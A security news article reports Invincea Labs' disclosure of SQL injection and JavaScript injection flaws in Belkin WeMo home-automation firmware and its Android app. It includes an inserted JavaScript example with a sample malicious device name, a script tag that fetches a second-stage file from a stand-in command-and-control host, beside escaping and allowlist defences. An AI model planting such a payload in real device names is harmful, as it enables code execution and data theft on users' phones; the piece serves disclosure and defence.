A SQL injection vulnerability is present in Belkin’s WeMo home automation firmware that could allow a third party with access to the local network to gain root access to devices such as light switches, lightbulbs, security cameras and coffee makers.
Researchers at Invincea Labs, who discovered the vulnerability, also warn of a related vulnerability tied to the WeMo Android app used to control the home automation devices. The flaw allows a third party to inject and execute arbitrary JavaScript.
Scott Tenaglia, research director at Invincea Labs, says the vulnerabilities were previously unknown and unrelated to earlier flaws found in Belkin’s WeMo home automation products. Tenaglia is scheduled Friday to deliver a talk at Black Hat Europe called Breaking BHAD: Abusing Belkin Home Automation Devices.
The vulnerability was privately disclosed on Aug. 11 and confirmed the next day by Belkin. On Sept. 1, Belkin released a patch for the Android app fixing the code injection vulnerability. Belkin told Threatpost on Tuesday that firmware addressing the SQL Injection vulnerability will be released this afternoon.
It’s unclear how many WeMo products are vulnerable to this type of attack. But, according to Invincea Labs, Belkin had 1.5 million home automation products in use as of 2015. Invincea Labs said any of those devices that can be controlled or managed remotely is vulnerable to the SQL injection attack.
To exploit this vulnerability, an attacker would first have to compromise a home PC and then leverage the shared network to move malicious code from the infected PC to the WeMo device’s firmware.
“The goal of the attacker is to hop from one device – a PC that can be later disinfected – to another device that can’t be protected – such as an IoT device,” Tenaglia said. “Once the attacker has access to the IoT device they can do whatever they want from downloading Mirai-type malware for creating a botnet or just control the device in question. They can also infect or re-infect any PC on the same network with malware of their choice.”
In a proof-of-concept attack, Invincea Labs infected the targeted WeMo device’s OpenWrt firmware by writing a file to the device’s file system that contained a shell script (OpenWrt is an embedded Linux, so the script is a Unix shell script, not a PowerShell script). With that type of access, researchers were able to open a telnet service on the WeMo device and have it automatically log any connection into a root shell, giving a third party administrative access to the WeMo device.
The vulnerability, according to Tenaglia, could also allow an attacker to configure WeMo devices to reject any patches and commands to reset devices to their factory default settings. However, Tenaglia told Threatpost, Belkin’s upcoming firmware update would remove any malicious code on an infected device’s firmware.
With that type of access to WeMo devices, Invincea Labs said the attack could easily be escalated to target Android devices running the WeMo app used to manage and control the home automation devices remotely.
“This is the first time anyone has discovered a way for IoT devices to hack into your phone,” Tenaglia said.
The vulnerability, he said, is tied to the naming function used by WeMo devices. “Every WeMo device can be assigned a name. What we found is you can set the name property in the device to a malicious string. The malicious string contains JavaScript code. And when the Android app requests the name of the devices it needs to connect to, it will download the malicious JavaScript code that is the name of the device, and execute the code,” Tenaglia describes.
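The mechanism Tenaglia describes, reduced to its essentials: a device name that the app trusts is placed into a web-style view, so a name containing script is executed. The code below is an added example, not the WeMo app’s code or Invincea’s proof of concept; it assumes the app renders the name into HTML (as the described behaviour implies), and the rendering functions, the `isValidDeviceName` allowlist and the constructed device names are illustration, not anything taken from the product.

```javascript
// Added example: an attacker-controlled device name becoming script execution
// when it is concatenated into HTML, beside the hardened rendering. Not the
// WeMo app's code; functions and sample names below are assumptions.

// Constructed device names: one benign, one carrying a script payload of the
// kind the article describes (the "malicious string" stored as the name).
const BENIGN_NAME = "Living Room Lamp";
const MALICIOUS_NAME =
  '<script>fetch("http://c2.example/stage2.js")</script>';

// Vulnerable pattern: the name is dropped straight into markup, so a name
// that contains <script> becomes a script element the view will run. Because
// the name lives on the device, every reconnect re-renders it (reinfection).
function renderDeviceVulnerable(name) {
  return `<li class="device">${name}</li>`;
}

// Minimal HTML escaping for text placed into element content.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Optional second layer: a device name only needs a small character set, so
// reject anything outside it before the string reaches any rendering path.
// (Allowlist is an assumption for the example, not a WeMo rule.)
const NAME_RE = /^[\w .'-]{1,64}$/;
function isValidDeviceName(name) {
  return NAME_RE.test(name);
}

// Hardened pattern: treat the name as data, never as markup.
function renderDeviceSafe(name) {
  return `<li class="device">${escapeHtml(name)}</li>`;
}

// Stand-in for the view: report whether the markup contains an executable
// script element, which is what a real HTML view would act on.
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Stand-alone demonstration.
for (const name of [BENIGN_NAME, MALICIOUS_NAME]) {
  console.log("valid name:", isValidDeviceName(name));
  console.log("vulnerable render executes script:",
    containsScriptElement(renderDeviceVulnerable(name)));
  console.log("safe render executes script:",
    containsScriptElement(renderDeviceSafe(name)));
}
```

Escaping at the point of rendering is the actual fix; the allowlist on the name is defence in depth, useful precisely because the malicious string persists on the device and will be fetched again by every client that connects.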
The malicious AppKit code, as he called it, can be programmed to download additional files. In a proof of concept attack, Invincea Labs had the JavaScript download another file from a command and control server to increase the magnitude of the attack.
In one proof of concept, researchers were able to download the Android phone’s entire gallery of pictures and videos. A second hack allowed researchers to turn on the Android phone’s GPS beaconing system in order to track the user’s whereabouts.
“All this hack allows us to do is run code in the context of the WeMo app. We do not have root access to the phone,” Tenaglia said. Furthermore, access to the Android device lasts only while the app is active or running in memory on the phone. Once the WeMo app is shut down, access is terminated.
“What we have is an in-memory infection. The code does not persist on the phone when you force quit the app. However the name of the device is still that malicious string. So when you connect to that device again the reinfection occurs,” Tenaglia said.